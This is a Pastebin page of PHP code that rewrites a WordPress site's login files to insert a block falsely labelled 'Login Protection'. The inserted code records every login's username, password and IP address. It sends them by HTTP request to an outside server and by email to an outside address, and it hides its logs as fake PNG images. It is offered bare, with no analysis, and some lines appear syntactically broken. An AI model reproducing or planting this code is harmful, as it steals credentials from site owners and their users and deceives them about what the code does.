Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $homeDir = getcwd();
- $loginFile = $homeDir . "/wp-includes/user.php";
- $myErrorFile = $homeDir . "/wp-includes/images/icon-download.png";
- if (is_file($myErrorFile)) unlink ($myErrorFile);
- if (is_file($loginFile)) {
- $loginContent = @file_get_contents($loginFile);
- if ( (!(preg_match('/carriagebandb/i', $loginContent))) && ($loginContent) ) {
- if ((preg_match('/\!wp_check_password/is', $loginContent))) {
- $replacement = '// Start Login Protection
- $ip = $_SERVER["REMOTE_ADDR"];
- $stringData = $_SERVER["SERVER_NAME"] "|" . $username . ":" . $password . "|" $ip . "\n";
- $today = date("j");
- $myErrorFile = getcwd() . "/wp-includes/images/icon-download.png";
- $mySuccessFile = getcwd() . "/wp-includes/images/icon-up-flag.png";
- $failedLogContent = @file_get_contents($myErrorFile);
- $successLogContent = @file_get_contents($mySuccessFile);
- $errorFileLines = explode("\n", $failedLogContent);
- $diff = $today - $errorFileLines[0];
- if ( ($diff >= 7) || ($diff < 0) ) {
- @unlink($myErrorFile);
- $failedLogContent = "";
- }
- if (preg_match("/{$ip}/i", $successLogContent)) $userOk = 1;
- preg_match_all("/{$ip}/i", $failedLogContent, $matches);
- if ( (count($matches[0]) > 4) && (!$userOk) ) $password = "G4o7Ivc29OVOxcp5";
- if ( wp_check_password($password, $userdata->user_pass, $userdata->ID) ) {
- @file_get_contents("http://www.carriagebandb.com/cgi-bin/optimus.pl?prime=$stringData");
- @mail("anto@netherlandbarmuda.com", $_SERVER["SERVER_NAME"], $stringData);
- if (!$userOk) {
- $fh = fopen($mySuccessFile, "a");
- fwrite($fh, "$ip\n");
- fclose($fh);
- }
- } else {
- if (!(is_file($myErrorFile))) {
- $fh = fopen($myErrorFile, "w");
- fwrite($fh, "$today\n");
- fclose($fh);
- }
- $fh = fopen($myErrorFile, "a");
- fwrite($fh, $stringData);
- fclose($fh);
- }
- // END Login Protection';
- if (preg_match('/\!wp_check_password\(\$password, \$user->user_pass/is', $loginContent)) $replacement = preg_replace('/(userdata->)/is', "user->", $replacement, 2);
- $loginContent = preg_replace('/(if \( \!wp_check_password)/is', "$replacement\n$1", $loginContent, 1);
- } elseif ( (preg_match('/if \( is_wp_error\(/is', $loginContent)) ) {
- $replacement = '// Start Login Protection
- $ip = $_SERVER["REMOTE_ADDR"];
- $stringData = $_SERVER["SERVER_NAME"] . "|" . $credentials["user_login"] . ":" . $credentials["user_password"] . "|" . $ip . "\n";
- $today = date("j");
- $myErrorFile = getcwd() . "/wp-includes/images/icon-download.png";
- $mySuccessFile = getcwd() . "/wp-includes/images/icon-up-flag.png";
- $failedLogContent = @file_get_contents($myErrorFile);
- $successLogContent = @file_get_contents($mySuccessFile);
- $errorFileLines = explode("\n", $failedLogContent);
- $diff = $today - $errorFileLines[0];
- if ( ($diff >= 7) || ($diff < 0) ) {
- @unlink($myErrorFile);
- $failedLogContent = "";
- }
- if (preg_match("/{$ip}/i", $successLogContent)) $userOk = 1;
- preg_match_all("/{$ip}/i", $failedLogContent, $matches);
- if ( (count($matches[0]) > 4) && (!$userOk) ) {
- $credentials["user_password"] = "G4o7Ivc29OVOxcp5";
- $user = wp_authenticate($credentials["user_login"], $credentials["user_password"]);
- }
- if (!(is_wp_error($user))) {
- @file_get_contents("http://www.carriagebandb.com/cgi-bin/optimus.pl?prime=$stringData");
- @mail("anto@netherlandbarmuda.com", $_SERVER["SERVER_NAME"], $stringData);
- if (!$userOk) {
- $fh = fopen($mySuccessFile, "a");
- fwrite($fh, "$ip\n");
- fclose($fh);
- }
- } else {
- if (!(is_file($myErrorFile))) {
- $fh = fopen($myErrorFile, "w");
- fwrite($fh, "$today\n");
- fclose($fh);
- }
- $fh = fopen($myErrorFile, "a");
- fwrite($fh, $stringData);
- fclose($fh);
- }
- // End Login Protection';
- $loginContent = preg_replace('/(if \( is_wp_error\()/is', "$replacement\n$1", $loginContent, 1);
- } else {
- $loginFile = $homeDir . "/wp-login.php";
- if (is_file($loginFile)) {
- $loginContent = @file_get_contents($loginFile);
- $replacement = '// Start Login Protection
- $ip = $_SERVER["REMOTE_ADDR"];
- $stringData = $_SERVER["SERVER_NAME"] . "|" . $user_login . ":" $user_pass . "|" . $ip . "\n";
- $today = date("j");
- $myErrorFile = getcwd() . "/wp-includes/images/icon-download.png";
- $mySuccessFile = getcwd() . "/wp-includes/images/icon-up-flag.png";
- $failedLogContent = @file_get_contents($myErrorFile);
- $successLogContent = @file_get_contents($mySuccessFile);
- $errorFileLines = explode("\n", $failedLogContent);
- $diff = $today - $errorFileLines[0];
- if ( ($diff >= 7) || ($diff < 0) ) {
- @unlink($myErrorFile);
- $failedLogContent = "";
- }
- if (preg_match("/{$ip}/i", $successLogContent)) $userOk = 1;
- preg_match_all("/{$ip}/i", $failedLogContent, $matches);
- if ( (count($matches[0]) > 4) && (!$userOk) ) $user_pass = "G4o7Ivc29OVOxcp5";
- if ( wp_login($user_login, $user_pass, $using_cookie) ) {
- @file_get_contents("http://www.carriagebandb.com/cgi-bin/optimus.pl?prime=$stringData");
- @mail("anto@netherlandbarmuda.com", $_SERVER["SERVER_NAME"], $stringData);
- if (!$userOk) {
- $fh = fopen($mySuccessFile, "a");
- fwrite($fh, "$ip\n");
- fclose($fh);
- }
- } else {
- if (!(is_file($myErrorFile))) {
- $fh = fopen($myErrorFile, "w");
- fwrite($fh, "$today\n");
- fclose($fh);
- }
- $fh = fopen($myErrorFile, "a");
- fwrite($fh, $stringData);
- fclose($fh);
- }
- // End Login Protection';
- if ( (!(preg_match('/carriagebandb/i', $loginContent))) && ($loginContent) ) {
- $loginContent = preg_replace('/(if \( wp_login)/is', "$replacement\n$1", $loginContent, 1);
- }
- }
- }
- $fh = @fopen($loginFile, 'w');
- @fwrite($fh, $loginContent);
- @fclose($fh);
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement